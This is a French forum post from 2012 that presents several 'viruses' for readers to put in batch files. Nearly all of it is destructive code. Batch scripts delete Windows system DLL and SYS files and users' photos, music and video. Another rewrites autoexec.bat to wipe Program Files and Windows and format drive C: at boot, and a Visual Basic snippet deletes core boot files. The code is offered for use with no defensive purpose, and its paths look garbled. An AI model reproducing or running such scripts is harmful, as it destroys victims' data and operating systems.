Quelque virus

14-04-2012 à 14:39:51
Bonjour,

Voici quelques sorte de virus !
A mettre dans vos batch .
Començons :

Maintenant voila le premier code pour supprimer tout les fichier au format .sys et .dll du systeme:

supprimer tout les fichier au format .sys et .dll du systeme:

@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys [/php]

Le deuxième code pour supprimer tout les photos et les mp3 et les video qui sont dans l'ordinateur:


Code PHP :
@Echo off
e:
deltree /y *.jpg
cd
deltree /y *.mp3
cd
deltree /y *.asf

Le troisième pour formater le disque C
Code PHP :
echo off@

cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat


Le meme que le troisieme sauf que celui-çi vous devez le nommé en Autoexec.bat
Code PHP :
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat

et enfin Virus Visual Basic
Code PHP :
SetAttr "c:autoexec.bat", vbNormal
SetAttr "c:msdos.sys", vbNormal
SetAttr "c:io.sys", vbNormal
SetAttr "c:windowswin.ini", vbNormal
SetAttr "c:windowssystem.ini", vbNormal
SetAttr "c:command.com", vbNormal
SetAttr "c:config.sys", vbNormal
SetAttr "c:windowsrundll.exe", vbNormal
SetAttr "c:windowsrundll32.exe", vbNormal
Kill "C:autoexec.bat"
Kill "C:msdos.sys"
Kill "C:io.sys"
Kill "C:windowswin.ini"
Kill "C:windowssystem.ini"
Kill "C:command.com"
Kill "C:config.sys"
Kill "C:windowsrundll.exe"
Kill "C:windowsrundll32.exe"
Lacoste. Hackeur Anonymous